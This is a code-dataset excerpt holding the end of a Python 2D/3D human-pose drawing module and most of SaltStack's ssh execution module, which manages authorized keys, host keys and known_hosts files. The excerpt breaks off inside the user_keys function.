"kth": [(0, 1), (1, 2), (5, 4), (4, 3), (6, 7), (7, 8), (11, 10), (10, 9), (2, 3), (3, 9), (2, 8), (9, 12), (8, 12), (12, 13)],
}
COLOR_DICT = {
'coco': [
(102, 0, 153), (153, 0, 102), (51, 0, 153), (153, 0, 153), # head
(51, 153, 0), (0, 153, 0), # left arm
(153, 102, 0), (153, 153, 0), # right arm
(0, 51, 153), (0, 0, 153), # left leg
(0, 153, 102), (0, 153, 153), # right leg
(153, 0, 0), (153, 0, 0), (153, 0, 0), (153, 0, 0) # body
],
'human36m': [
(0, 153, 102), (0, 153, 153), (0, 153, 153), # right leg
(0, 51, 153), (0, 0, 153), (0, 0, 153), # left leg
(153, 0, 0), (153, 0, 0), # body
(153, 0, 102), (153, 0, 102), # head
(153, 153, 0), (153, 153, 0), (153, 102, 0), # right arm
(0, 153, 0), (0, 153, 0), (51, 153, 0) # left arm
],
'kth': [
(0, 153, 102), (0, 153, 153), # right leg
(0, 51, 153), (0, 0, 153), # left leg
(153, 102, 0), (153, 153, 0), # right arm
(51, 153, 0), (0, 153, 0), # left arm
(153, 0, 0), (153, 0, 0), (153, 0, 0), (153, 0, 0), (153, 0, 0), # body
(102, 0, 153) # head
]
}
JOINT_NAMES_DICT = {
'coco': {
0: "nose",
1: "left_eye",
2: "right_eye",
3: "left_ear",
4: "right_ear",
5: "left_shoulder",
6: "right_shoulder",
7: "left_elbow",
8: "right_elbow",
9: "left_wrist",
10: "right_wrist",
11: "left_hip",
12: "right_hip",
13: "left_knee",
14: "right_knee",
15: "left_ankle",
16: "right_ankle"
}
}
def draw_2d_pose(keypoints, ax, kind='human36m', keypoints_mask=None, point_size=8, line_width=3, radius=None, color=None):
"""
Visualizes a 2d skeleton
Args
keypoints numpy array of shape (19, 2): pose to draw in CMU format.
ax: matplotlib axis to draw on
"""
connectivity = CONNECTIVITY_DICT[kind]
color = 'blue' if color is None else color
if keypoints_mask is None:
keypoints_mask = [True] * len(keypoints)
# connections
for i, (index_from, index_to) in enumerate(connectivity):
if kind in COLOR_DICT:
color = COLOR_DICT[kind][i]
else:
color = (0, 0, 255)
if keypoints_mask[index_from] and keypoints_mask[index_to]:
xs, ys = [np.array([keypoints[index_from, j], keypoints[index_to, j]]) for j in range(2)]
ax.plot(xs, ys, c=[c / 255. for c in color], lw=line_width, zorder=1)
# points
ax.scatter(keypoints[keypoints_mask][:, 0], keypoints[keypoints_mask][:, 1], c='red', s=point_size, zorder=2)
# if radius is not None:
# root_keypoint_index = 0
# xroot, yroot = keypoints[root_keypoint_index, 0], keypoints[root_keypoint_index, 1]
# ax.set_xlim([-radius + xroot, radius + xroot])
# ax.set_ylim([-radius + yroot, radius + yroot])
# ax.set_aspect('equal')
def draw_2d_pose_cv2(keypoints, canvas, kind='cmu', keypoints_mask=None, point_size=2, point_color=(255, 255, 255), line_width=1, radius=None, color=None, anti_aliasing_scale=1):
canvas = canvas.copy()
shape = np.array(canvas.shape[:2])
new_shape = shape * anti_aliasing_scale
canvas = resize_image(canvas, tuple(new_shape))
keypoints = keypoints * anti_aliasing_scale
point_size = point_size * anti_aliasing_scale
line_width = line_width * anti_aliasing_scale
connectivity = CONNECTIVITY_DICT[kind]
color = 'blue' if color is None else color
if keypoints_mask is None:
keypoints_mask = [True] * len(keypoints)
# connections
for i, (index_from, index_to) in enumerate(connectivity):
if keypoints_mask[index_from] and keypoints_mask[index_to]:
pt_from = tuple(np.array(keypoints[index_from, :]).astype(int))
pt_to = tuple(np.array(keypoints[index_to, :]).astype(int))
if kind in COLOR_DICT:
color = COLOR_DICT[kind][i]
else:
color = (0, 0, 255)
cv2.line(canvas, pt_from, pt_to, color=color, thickness=line_width)
if kind == 'coco':
mid_collarbone = (keypoints[5, :] + keypoints[6, :]) / 2
nose = keypoints[0, :]
pt_from = tuple(np.array(nose).astype(int))
pt_to = tuple(np.array(mid_collarbone).astype(int))
if kind in COLOR_DICT:
color = (153, 0, 51)
else:
color = (0, 0, 255)
cv2.line(canvas, pt_from, pt_to, color=color, thickness=line_width)
# points
for pt in keypoints[keypoints_mask]:
cv2.circle(canvas, tuple(pt.astype(int)), point_size, color=point_color, thickness=-1)
canvas = resize_image(canvas, tuple(shape))
return canvas
def draw_3d_pose(keypoints, ax, keypoints_mask=None, kind='cmu', radius=None, root=None, point_size=2, line_width=2, draw_connections=True):
connectivity = CONNECTIVITY_DICT[kind]
if keypoints_mask is None:
keypoints_mask = [True] * len(keypoints)
if draw_connections:
# Make connection matrix
for i, joint in enumerate(connectivity):
if keypoints_mask[joint[0]] and keypoints_mask[joint[1]]:
xs, ys, zs = [np.array([keypoints[joint[0], j], keypoints[joint[1], j]]) for j in range(3)]
if kind in COLOR_DICT:
color = COLOR_DICT[kind][i]
else:
color = (0, 0, 255)
color = np.array(color) / 255
ax.plot(xs, ys, zs, lw=line_width, c=color)
if kind == 'coco':
mid_collarbone = (keypoints[5, :] + keypoints[6, :]) / 2
nose = keypoints[0, :]
xs, ys, zs = [np.array([nose[j], mid_collarbone[j]]) for j in range(3)]
if kind in COLOR_DICT:
color = (153, 0, 51)
else:
color = (0, 0, 255)
color = np.array(color) / 255
ax.plot(xs, ys, zs, lw=line_width, c=color)
ax.scatter(keypoints[keypoints_mask][:, 0], keypoints[keypoints_mask][:, 1], keypoints[keypoints_mask][:, 2],
s=point_size, c=np.array([230, 145, 56])/255, edgecolors='black') # np.array([230, 145, 56])/255
if radius is not None:
if root is None:
root = np.mean(keypoints, axis=0)
xroot, yroot, zroot = root
ax.set_xlim([-radius + xroot, radius + xroot])
ax.set_ylim([-radius + yroot, radius + yroot])
ax.set_zlim([-radius + zroot, radius + zroot])
ax.set_aspect('equal')
# Get rid of the panes
background_color = np.array([252, 252, 252]) / 255
ax.w_xaxis.set_pane_color(background_color)
ax.w_yaxis.set_pane_color(background_color)
ax.w_zaxis.set_pane_color(background_color)
# Get rid of the ticks
ax.set_xticklabels([])
ax.set_yticklabels([])
ax.set_zticklabels([])
if __name__ == '__main__':
fig = plt.figure()
ax = fig.add_subplot(111)
draw_2d_pose(np.ones((17, 2)), ax) | 33.830579 | 178 | 0.543545 |
db5431a85aa344517332f5ef184d8d161f711a87 | 38,190 | py | Python | salt/modules/ssh.py | borgstrom/salt | 2f732b5e8cd0b2a13f133d02f70aba3ee9fc0169 | [
"Apache-2.0"
] | null | null | null | salt/modules/ssh.py | borgstrom/salt | 2f732b5e8cd0b2a13f133d02f70aba3ee9fc0169 | [
"Apache-2.0"
] | null | null | null | salt/modules/ssh.py | borgstrom/salt | 2f732b5e8cd0b2a13f133d02f70aba3ee9fc0169 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
'''
Manage client ssh components
.. note:: This module requires the use of MD5 hashing. Certain
security audits may not permit the use of MD5. For those cases,
this module should be disabled or removed.
'''
from __future__ import absolute_import
# Import python libs
import os
import re
import hashlib
import binascii
import logging
import subprocess
# Import salt libs
import salt.utils
import salt.utils.decorators as decorators
from salt.exceptions import (
SaltInvocationError,
CommandExecutionError,
)
from salt.ext.six.moves import range
log = logging.getLogger(__name__)
DEFAULT_SSH_PORT = 22
def __virtual__():
# TODO: This could work on windows with some love
if salt.utils.is_windows():
return (False, 'The module cannot be loaded on windows.')
return True
def _refine_enc(enc):
'''
Return the properly formatted ssh value for the authorized encryption key
type. ecdsa defaults to 256 bits, must give full ecdsa enc schema string
if using higher enc. If the type is not found, raise CommandExecutionError.
'''
rsa = ['r', 'rsa', 'ssh-rsa']
dss = ['d', 'dsa', 'dss', 'ssh-dss']
ecdsa = ['e', 'ecdsa', 'ecdsa-sha2-nistp521', 'ecdsa-sha2-nistp384',
'ecdsa-sha2-nistp256']
ed25519 = ['ed25519', 'ssh-ed25519']
if enc in rsa:
return 'ssh-rsa'
elif enc in dss:
return 'ssh-dss'
elif enc in ecdsa:
# ecdsa defaults to ecdsa-sha2-nistp256
# otherwise enc string is actual encoding string
if enc in ['e', 'ecdsa']:
return 'ecdsa-sha2-nistp256'
return enc
elif enc in ed25519:
return 'ssh-ed25519'
else:
raise CommandExecutionError(
'Incorrect encryption key type \'{0}\'.'.format(enc)
)
def _format_auth_line(key, enc, comment, options):
'''
Properly format user input.
'''
line = ''
if options:
line += '{0} '.format(','.join(options))
line += '{0} {1} {2}\n'.format(enc, key, comment)
return line
def _expand_authorized_keys_path(path, user, home):
'''
Expand the AuthorizedKeysFile expression. Defined in man sshd_config(5)
'''
converted_path = ''
had_escape = False
for char in path:
if had_escape:
had_escape = False
if char == '%':
converted_path += '%'
elif char == 'u':
converted_path += user
elif char == 'h':
converted_path += home
else:
error = 'AuthorizedKeysFile path: unknown token character "%{0}"'.format(char)
raise CommandExecutionError(error)
continue
elif char == '%':
had_escape = True
else:
converted_path += char
if had_escape:
error = "AuthorizedKeysFile path: Last character can't be escape character"
raise CommandExecutionError(error)
return converted_path
def _get_config_file(user, config):
'''
Get absolute path to a user's ssh_config.
'''
uinfo = __salt__['user.info'](user)
if not uinfo:
raise CommandExecutionError('User \'{0}\' does not exist'.format(user))
home = uinfo['home']
if not os.path.isabs(config):
config = os.path.join(home, config)
config = _expand_authorized_keys_path(config, user, home)
return config
def _replace_auth_key(
user,
key,
enc='ssh-rsa',
comment='',
options=None,
config='.ssh/authorized_keys'):
'''
Replace an existing key
'''
auth_line = _format_auth_line(key, enc, comment, options or [])
lines = []
full = _get_config_file(user, config)
try:
# open the file for both reading AND writing
with salt.utils.fopen(full, 'r') as _fh:
for line in _fh:
if line.startswith('#'):
# Commented Line
lines.append(line)
continue
comps = line.split()
if len(comps) < 2:
# Not a valid line
lines.append(line)
continue
key_ind = 1
if comps[0][:4:] not in ['ssh-', 'ecds']:
key_ind = 2
if comps[key_ind] == key:
lines.append(auth_line)
else:
lines.append(line)
_fh.close()
# Re-open the file writable after properly closing it
with salt.utils.fopen(full, 'w') as _fh:
# Write out any changes
_fh.writelines(lines)
except (IOError, OSError) as exc:
raise CommandExecutionError(
'Problem reading or writing to key file: {0}'.format(exc)
)
def _validate_keys(key_file):
'''
Return a dict containing validated keys in the passed file
'''
ret = {}
linere = re.compile(r'^(.*?)\s?((?:ssh\-|ecds)[\w-]+\s.+)$')
try:
with salt.utils.fopen(key_file, 'r') as _fh:
for line in _fh:
if line.startswith('#'):
# Commented Line
continue
# get "{options} key"
search = re.search(linere, line)
if not search:
# not an auth ssh key, perhaps a blank line
continue
opts = search.group(1)
comps = search.group(2).split()
if len(comps) < 2:
# Not a valid line
continue
if opts:
# It has options, grab them
options = opts.split(',')
else:
options = []
enc = comps[0]
key = comps[1]
comment = ' '.join(comps[2:])
fingerprint = _fingerprint(key)
if fingerprint is None:
continue
ret[key] = {'enc': enc,
'comment': comment,
'options': options,
'fingerprint': fingerprint}
except (IOError, OSError):
raise CommandExecutionError(
'Problem reading ssh key file {0}'.format(key_file)
)
return ret
def _fingerprint(public_key):
'''
Return a public key fingerprint based on its base64-encoded representation
The fingerprint string is formatted according to RFC 4716 (ch.4), that is,
in the form "xx:xx:...:xx"
If the key is invalid (incorrect base64 string), return None
'''
try:
raw_key = public_key.decode('base64')
except binascii.Error:
return None
ret = hashlib.md5(raw_key).hexdigest()
chunks = [ret[i:i + 2] for i in range(0, len(ret), 2)]
return ':'.join(chunks)
def _get_known_hosts_file(config=None, user=None):
if user:
config = config or '.ssh/known_hosts'
else:
config = config or '/etc/ssh/ssh_known_hosts'
if os.path.isabs(config):
full = config
else:
if user:
uinfo = __salt__['user.info'](user)
if not uinfo:
return {'status': 'error',
'error': 'User {0} does not exist'.format(user)}
full = os.path.join(uinfo['home'], config)
else:
return {
'status': 'error',
'error': 'Cannot determine absolute path to file.'
}
return full
def host_keys(keydir=None, private=True):
'''
Return the minion's host keys
CLI Example:
.. code-block:: bash
salt '*' ssh.host_keys
salt '*' ssh.host_keys keydir=/etc/ssh
salt '*' ssh.host_keys keydir=/etc/ssh private=False
'''
# TODO: support parsing sshd_config for the key directory
if not keydir:
if __grains__['kernel'] == 'Linux':
keydir = '/etc/ssh'
else:
# If keydir is None, os.listdir() will blow up
raise SaltInvocationError('ssh.host_keys: Please specify a keydir')
keys = {}
for fn_ in os.listdir(keydir):
if fn_.startswith('ssh_host_'):
if fn_.endswith('.pub') is False and private is False:
log.info('Skipping private key file {0} as private is set to False'.format(fn_))
continue
top = fn_.split('.')
comps = top[0].split('_')
kname = comps[2]
if len(top) > 1:
kname += '.{0}'.format(top[1])
try:
with salt.utils.fopen(os.path.join(keydir, fn_), 'r') as _fh:
# As of RFC 4716 "a key file is a text file, containing a sequence of lines",
# although some SSH implementations (e.g. OpenSSH) manage their own format(s).
# Please see #20708 for a discussion about how to handle SSH key files in the future
keys[kname] = _fh.readline()
# only read the whole file if it is not in the legacy 1.1 binary format
if keys[kname] != "SSH PRIVATE KEY FILE FORMAT 1.1\n":
keys[kname] += _fh.read()
keys[kname] = keys[kname].strip()
except (IOError, OSError):
keys[kname] = ''
return keys
def auth_keys(user=None, config='.ssh/authorized_keys'):
'''
Return the authorized keys for users
CLI Example:
.. code-block:: bash
salt '*' ssh.auth_keys
salt '*' ssh.auth_keys root
salt '*' ssh.auth_keys user=root
salt '*' ssh.auth_keys user="[user1, user2]"
'''
if not user:
user = __salt__['user.list_users']()
old_output_when_one_user = False
if not isinstance(user, list):
user = [user]
old_output_when_one_user = True
keys = {}
for u in user:
full = None
try:
full = _get_config_file(u, config)
except CommandExecutionError:
pass
if full and os.path.isfile(full):
keys[u] = _validate_keys(full)
if old_output_when_one_user:
if user[0] in keys:
return keys[user[0]]
else:
return {}
return keys
def check_key_file(user,
source,
config='.ssh/authorized_keys',
saltenv='base',
env=None):
'''
Check a keyfile from a source destination against the local keys and
return the keys to change
CLI Example:
.. code-block:: bash
salt '*' ssh.check_key_file root salt://ssh/keyfile
'''
if env is not None:
salt.utils.warn_until(
'Boron',
'Passing a salt environment should be done using \'saltenv\' '
'not \'env\'. This functionality will be removed in Salt Boron.'
)
# Backwards compatibility
saltenv = env
keyfile = __salt__['cp.cache_file'](source, saltenv)
if not keyfile:
return {}
s_keys = _validate_keys(keyfile)
if not s_keys:
err = 'No keys detected in {0}. Is file properly ' \
'formatted?'.format(source)
log.error(err)
__context__['ssh_auth.error'] = err
return {}
else:
ret = {}
for key in s_keys:
ret[key] = check_key(
user,
key,
s_keys[key]['enc'],
s_keys[key]['comment'],
s_keys[key]['options'],
config)
return ret
def check_key(user, key, enc, comment, options, config='.ssh/authorized_keys',
cache_keys=None):
'''
Check to see if a key needs updating, returns "update", "add" or "exists"
CLI Example:
.. code-block:: bash
salt '*' ssh.check_key <user> <key> <enc> <comment> <options>
'''
if cache_keys is None:
cache_keys = []
enc = _refine_enc(enc)
current = auth_keys(user, config)
nline = _format_auth_line(key, enc, comment, options)
# Removing existing keys from the auth_keys isn't really a good idea
# in fact
#
# as:
# - We can have non-salt managed keys in that file
# - We can have multiple states defining keys for an user
# and with such code only one state will win
# the remove all-other-keys war
#
# if cache_keys:
# for pub_key in set(current).difference(set(cache_keys)):
# rm_auth_key(user, pub_key)
if key in current:
cline = _format_auth_line(key,
current[key]['enc'],
current[key]['comment'],
current[key]['options'])
if cline != nline:
return 'update'
else:
return 'add'
return 'exists'
def rm_auth_key_from_file(user,
source,
config='.ssh/authorized_keys',
saltenv='base',
env=None):
'''
Remove an authorized key from the specified user's authorized key file, using a file as source
CLI Example:
.. code-block:: bash
salt '*' ssh.rm_auth_key_from_file <user> salt://ssh_keys/<user>.id_rsa.pub
'''
if env is not None:
salt.utils.warn_until(
'Boron',
'Passing a salt environment should be done using \'saltenv\' '
'not \'env\'. This functionality will be removed in Salt Boron.'
)
# Backwards compatibility
saltenv = env
lfile = __salt__['cp.cache_file'](source, saltenv)
if not os.path.isfile(lfile):
raise CommandExecutionError(
'Failed to pull key file from salt file server'
)
s_keys = _validate_keys(lfile)
if not s_keys:
err = (
'No keys detected in {0}. Is file properly formatted?'.format(
source
)
)
log.error(err)
__context__['ssh_auth.error'] = err
return 'fail'
else:
rval = ''
for key in s_keys:
rval += rm_auth_key(
user,
key,
config
)
# Due to the ability for a single file to have multiple keys, it's
# possible for a single call to this function to have both "replace"
# and "new" as possible valid returns. I ordered the following as I
# thought best.
if 'Key not removed' in rval:
return 'Key not removed'
elif 'Key removed' in rval:
return 'Key removed'
else:
return 'Key not present'
def rm_auth_key(user, key, config='.ssh/authorized_keys'):
'''
Remove an authorized key from the specified user's authorized key file
CLI Example:
.. code-block:: bash
salt '*' ssh.rm_auth_key <user> <key>
'''
current = auth_keys(user, config)
linere = re.compile(r'^(.*?)\s?((?:ssh\-|ecds)[\w-]+\s.+)$')
if key in current:
# Remove the key
full = _get_config_file(user, config)
# Return something sensible if the file doesn't exist
if not os.path.isfile(full):
return 'Authorized keys file {0} not present'.format(full)
lines = []
try:
# Read every line in the file to find the right ssh key
# and then write out the correct one. Open the file once
with salt.utils.fopen(full, 'r') as _fh:
for line in _fh:
if line.startswith('#'):
# Commented Line
lines.append(line)
continue
# get "{options} key"
search = re.search(linere, line)
if not search:
# not an auth ssh key, perhaps a blank line
continue
comps = search.group(2).split()
if len(comps) < 2:
# Not a valid line
lines.append(line)
continue
pkey = comps[1]
# This is the key we are "deleting", so don't put
# it in the list of keys to be re-added back
if pkey == key:
continue
lines.append(line)
# Let the context manager do the right thing here and then
# re-open the file in write mode to save the changes out.
with salt.utils.fopen(full, 'w') as _fh:
_fh.writelines(lines)
except (IOError, OSError) as exc:
log.warn('Could not read/write key file: {0}'.format(str(exc)))
return 'Key not removed'
return 'Key removed'
# TODO: Should this function return a simple boolean?
return 'Key not present'
def set_auth_key_from_file(user,
source,
config='.ssh/authorized_keys',
saltenv='base',
env=None):
'''
Add a key to the authorized_keys file, using a file as the source.
CLI Example:
.. code-block:: bash
salt '*' ssh.set_auth_key_from_file <user> salt://ssh_keys/<user>.id_rsa.pub
'''
if env is not None:
salt.utils.warn_until(
'Boron',
'Passing a salt environment should be done using \'saltenv\' '
'not \'env\'. This functionality will be removed in Salt Boron.'
)
# Backwards compatibility
saltenv = env
# TODO: add support for pulling keys from other file sources as well
lfile = __salt__['cp.cache_file'](source, saltenv)
if not os.path.isfile(lfile):
raise CommandExecutionError(
'Failed to pull key file from salt file server'
)
s_keys = _validate_keys(lfile)
if not s_keys:
err = (
'No keys detected in {0}. Is file properly formatted?'.format(
source
)
)
log.error(err)
__context__['ssh_auth.error'] = err
return 'fail'
else:
rval = ''
for key in s_keys:
rval += set_auth_key(
user,
key,
s_keys[key]['enc'],
s_keys[key]['comment'],
s_keys[key]['options'],
config,
list(s_keys.keys())
)
# Due to the ability for a single file to have multiple keys, it's
# possible for a single call to this function to have both "replace"
# and "new" as possible valid returns. I ordered the following as I
# thought best.
if 'fail' in rval:
return 'fail'
elif 'replace' in rval:
return 'replace'
elif 'new' in rval:
return 'new'
else:
return 'no change'
def set_auth_key(
user,
key,
enc='ssh-rsa',
comment='',
options=None,
config='.ssh/authorized_keys',
cache_keys=None):
'''
Add a key to the authorized_keys file. The "key" parameter must only be the
string of text that is the encoded key. If the key begins with "ssh-rsa"
or ends with user@host, remove those from the key before passing it to this
function.
CLI Example:
.. code-block:: bash
salt '*' ssh.set_auth_key <user> '<key>' enc='dsa'
'''
if cache_keys is None:
cache_keys = []
if len(key.split()) > 1:
return 'invalid'
enc = _refine_enc(enc)
uinfo = __salt__['user.info'](user)
if not uinfo:
return 'fail'
status = check_key(user, key, enc, comment, options, config, cache_keys)
if status == 'update':
_replace_auth_key(user, key, enc, comment, options or [], config)
return 'replace'
elif status == 'exists':
return 'no change'
else:
auth_line = _format_auth_line(key, enc, comment, options)
fconfig = _get_config_file(user, config)
# Fail if the key lives under the user's homedir, and the homedir
# doesn't exist
udir = uinfo.get('home', '')
if fconfig.startswith(udir) and not os.path.isdir(udir):
return 'fail'
if not os.path.isdir(os.path.dirname(fconfig)):
dpath = os.path.dirname(fconfig)
os.makedirs(dpath)
if os.geteuid() == 0:
os.chown(dpath, uinfo['uid'], uinfo['gid'])
os.chmod(dpath, 448)
# If SELINUX is available run a restorecon on the file
rcon = salt.utils.which('restorecon')
if rcon:
cmd = [rcon, dpath]
subprocess.call(cmd)
if not os.path.isfile(fconfig):
new_file = True
else:
new_file = False
try:
with salt.utils.fopen(fconfig, 'a+') as _fh:
if new_file is False:
# Let's make sure we have a new line at the end of the file
_fh.seek(1024, 2)
if not _fh.read(1024).rstrip(' ').endswith('\n'):
_fh.seek(0, 2)
_fh.write('\n')
_fh.write('{0}'.format(auth_line))
except (IOError, OSError) as exc:
msg = 'Could not write to key file: {0}'
raise CommandExecutionError(msg.format(str(exc)))
if new_file:
if os.geteuid() == 0:
os.chown(fconfig, uinfo['uid'], uinfo['gid'])
os.chmod(fconfig, 384)
# If SELINUX is available run a restorecon on the file
rcon = salt.utils.which('restorecon')
if rcon:
cmd = [rcon, fconfig]
subprocess.call(cmd)
return 'new'
def _parse_openssh_output(lines):
'''
Helper function which parses ssh-keygen -F and ssh-keyscan function output
and yield dict with keys information, one by one.
'''
for line in lines:
if line.startswith('#'):
continue
try:
hostname, enc, key = line.split()
except ValueError: # incorrect format
continue
fingerprint = _fingerprint(key)
if not fingerprint:
continue
yield {'hostname': hostname, 'key': key, 'enc': enc,
'fingerprint': fingerprint}
@decorators.which('ssh-keygen')
def get_known_host(user, hostname, config=None, port=None):
'''
Return information about known host from the configfile, if any.
If there is no such key, return None.
CLI Example:
.. code-block:: bash
salt '*' ssh.get_known_host <user> <hostname>
'''
full = _get_known_hosts_file(config=config, user=user)
if isinstance(full, dict):
return full
ssh_hostname = _hostname_and_port_to_ssh_hostname(hostname, port)
cmd = ['ssh-keygen', '-F', ssh_hostname, '-f', full]
lines = __salt__['cmd.run'](cmd,
ignore_retcode=True,
python_shell=False).splitlines()
known_hosts = list(_parse_openssh_output(lines))
return known_hosts[0] if known_hosts else None
@decorators.which('ssh-keyscan')
def recv_known_host(hostname,
enc=None,
port=None,
hash_hostname=True,
hash_known_hosts=True,
timeout=5):
'''
Retrieve information about host public key from remote server
hostname
The name of the remote host (e.g. "github.com")
enc
Defines what type of key is being used, can be ed25519, ecdsa ssh-rsa
or ssh-dss
port
optional parameter, denoting the port of the remote host, which will be
used in case, if the public key will be requested from it. By default
the port 22 is used.
hash_hostname : True
Hash all hostnames and addresses in the known hosts file.
.. deprecated:: Carbon
Please use hash_known_hosts instead.
hash_known_hosts : True
Hash all hostnames and addresses in the known hosts file.
timeout : int
Set the timeout for connection attempts. If ``timeout`` seconds have
elapsed since a connection was initiated to a host or since the last
time anything was read from that host, then the connection is closed
and the host in question considered unavailable. Default is 5 seconds.
.. versionadded:: Boron
CLI Example:
.. code-block:: bash
salt '*' ssh.recv_known_host <hostname> enc=<enc> port=<port>
'''
if not hash_hostname:
salt.utils.warn_until(
'Carbon',
'The hash_hostname parameter is misleading as ssh-keygen can only '
'hash the whole known hosts file, not entries for individual '
'hosts. Please use hash_known_hosts=False instead.')
hash_known_hosts = hash_hostname
# The following list of OSes have an old version of openssh-clients
# and thus require the '-t' option for ssh-keyscan
need_dash_t = ('CentOS-5',)
cmd = ['ssh-keyscan']
if port:
cmd.extend(['-p', port])
if enc:
cmd.extend(['-t', enc])
if not enc and __grains__.get('osfinger') in need_dash_t:
cmd.extend(['-t', 'rsa'])
if hash_known_hosts:
cmd.append('-H')
cmd.extend(['-T', str(timeout)])
cmd.append(hostname)
lines = __salt__['cmd.run'](cmd, python_shell=False).splitlines()
known_hosts = list(_parse_openssh_output(lines))
return known_hosts[0] if known_hosts else None
def check_known_host(user=None, hostname=None, key=None, fingerprint=None,
config=None, port=None):
'''
Check the record in known_hosts file, either by its value or by fingerprint
(it's enough to set up either key or fingerprint, you don't need to set up
both).
If provided key or fingerprint doesn't match with stored value, return
"update", if no value is found for a given host, return "add", otherwise
return "exists".
If neither key, nor fingerprint is defined, then additional validation is
not performed.
CLI Example:
.. code-block:: bash
salt '*' ssh.check_known_host <user> <hostname> key='AAAA...FAaQ=='
'''
if not hostname:
return {'status': 'error',
'error': 'hostname argument required'}
if not user:
config = config or '/etc/ssh/ssh_known_hosts'
else:
config = config or '.ssh/known_hosts'
known_host = get_known_host(user, hostname, config=config, port=port)
if not known_host or 'fingerprint' not in known_host:
return 'add'
if key:
return 'exists' if key == known_host['key'] else 'update'
elif fingerprint:
return ('exists' if fingerprint == known_host['fingerprint']
else 'update')
else:
return 'exists'
def rm_known_host(user=None, hostname=None, config=None, port=None):
'''
Remove all keys belonging to hostname from a known_hosts file.
CLI Example:
.. code-block:: bash
salt '*' ssh.rm_known_host <user> <hostname>
'''
if not hostname:
return {'status': 'error',
'error': 'hostname argument required'}
full = _get_known_hosts_file(config=config, user=user)
if isinstance(full, dict):
return full
if not os.path.isfile(full):
return {'status': 'error',
'error': 'Known hosts file {0} does not exist'.format(full)}
ssh_hostname = _hostname_and_port_to_ssh_hostname(hostname, port)
cmd = ['ssh-keygen', '-R', ssh_hostname, '-f', full]
cmd_result = __salt__['cmd.run'](cmd, python_shell=False)
# ssh-keygen creates a new file, thus a chown is required.
if os.geteuid() == 0 and user:
uinfo = __salt__['user.info'](user)
os.chown(full, uinfo['uid'], uinfo['gid'])
return {'status': 'removed', 'comment': cmd_result}
def set_known_host(user=None,
hostname=None,
fingerprint=None,
key=None,
port=None,
enc=None,
hash_hostname=True,
config=None,
hash_known_hosts=True,
timeout=5):
'''
Download SSH public key from remote host "hostname", optionally validate
its fingerprint against "fingerprint" variable and save the record in the
known_hosts file.
If such a record does already exists in there, do nothing.
user
The user who owns the ssh authorized keys file to modify
hostname
The name of the remote host (e.g. "github.com")
fingerprint
The fingerprint of the key which must be presented in the known_hosts
file (optional if key specified)
key
The public key which must be presented in the known_hosts file
(optional if fingerprint specified)
port
optional parameter, denoting the port of the remote host, which will be
used in case, if the public key will be requested from it. By default
the port 22 is used.
enc
Defines what type of key is being used, can be ed25519, ecdsa ssh-rsa
or ssh-dss
hash_hostname : True
Hash all hostnames and addresses in the known hosts file.
.. deprecated:: Carbon
Please use hash_known_hosts instead.
config
The location of the authorized keys file relative to the user's home
directory, defaults to ".ssh/known_hosts". If no user is specified,
defaults to "/etc/ssh/ssh_known_hosts". If present, must be an
absolute path when a user is not specified.
hash_known_hosts : True
Hash all hostnames and addresses in the known hosts file.
timeout : int
Set the timeout for connection attempts. If ``timeout`` seconds have
elapsed since a connection was initiated to a host or since the last
time anything was read from that host, then the connection is closed
and the host in question considered unavailable. Default is 5 seconds.
.. versionadded:: Boron
CLI Example:
.. code-block:: bash
salt '*' ssh.set_known_host <user> fingerprint='xx:xx:..:xx' enc='ssh-rsa' config='.ssh/known_hosts'
'''
if not hostname:
return {'status': 'error',
'error': 'hostname argument required'}
if not hash_hostname:
salt.utils.warn_until(
'Carbon',
'The hash_hostname parameter is misleading as ssh-keygen can only '
'hash the whole known hosts file, not entries for individual '
'hosts. Please use hash_known_hosts=False instead.')
hash_known_hosts = hash_hostname
if port is not None and port != DEFAULT_SSH_PORT and hash_known_hosts:
return {'status': 'error',
'error': 'argument port can not be used in '
'conjunction with argument hash_known_hosts'}
update_required = False
check_required = False
stored_host = get_known_host(user, hostname, config, port)
if not stored_host:
update_required = True
elif fingerprint and fingerprint != stored_host['fingerprint']:
update_required = True
elif key and key != stored_host['key']:
update_required = True
elif key != stored_host['key']:
check_required = True
if not update_required and not check_required:
return {'status': 'exists', 'key': stored_host['key']}
if not key:
remote_host = recv_known_host(hostname,
enc=enc,
port=port,
hash_known_hosts=hash_known_hosts,
timeout=timeout)
if not remote_host:
return {'status': 'error',
'error': 'Unable to receive remote host key'}
if fingerprint and fingerprint != remote_host['fingerprint']:
return {'status': 'error',
'error': ('Remote host public key found but its fingerprint '
'does not match one you have provided')}
if check_required:
if remote_host['key'] == stored_host['key']:
return {'status': 'exists', 'key': stored_host['key']}
# remove everything we had in the config so far
rm_known_host(user, hostname, config=config)
# set up new value
full = _get_known_hosts_file(config=config, user=user)
if isinstance(full, dict):
return full
if key:
remote_host = {'hostname': hostname, 'enc': enc, 'key': key}
if hash_known_hosts or port in [DEFAULT_SSH_PORT, None] or ':' in remote_host['hostname']:
line = '{hostname} {enc} {key}\n'.format(**remote_host)
else:
remote_host['port'] = port
line = '[{hostname}]:{port} {enc} {key}\n'.format(**remote_host)
# ensure ~/.ssh exists
ssh_dir = os.path.dirname(full)
if user:
uinfo = __salt__['user.info'](user)
try:
log.debug('Ensuring ssh config dir "{0}" exists'.format(ssh_dir))
os.makedirs(ssh_dir)
except OSError as exc:
if exc.args[1] == 'Permission denied':
log.error('Unable to create directory {0}: '
'{1}'.format(ssh_dir, exc.args[1]))
elif exc.args[1] == 'File exists':
log.debug('{0} already exists, no need to create '
'it'.format(ssh_dir))
else:
# set proper ownership/permissions
if user:
os.chown(ssh_dir, uinfo['uid'], uinfo['gid'])
os.chmod(ssh_dir, 0o700)
# write line to known_hosts file
try:
with salt.utils.fopen(full, 'a') as ofile:
ofile.write(line)
except (IOError, OSError) as exception:
raise CommandExecutionError(
"Couldn't append to known hosts file: '{0}'".format(exception)
)
if os.geteuid() == 0 and user:
os.chown(full, uinfo['uid'], uinfo['gid'])
os.chmod(full, 0o644)
if key and hash_known_hosts:
cmd_result = __salt__['ssh.hash_known_hosts'](user=user, config=full)
return {'status': 'updated', 'old': stored_host, 'new': remote_host}
def user_keys(user=None, pubfile=None, prvfile=None):
'''
Return the user's ssh keys on the minion
.. versionadded:: 2014.7.0
CLI Example:
.. code-block:: bash
salt '*' ssh.user_keys
salt '*' ssh.user_keys user=user1
salt '*' ssh.user_keys user=user1 pubfile=/home/user1/.ssh/id_rsa.pub prvfile=/home/user1/.ssh/id_rsa
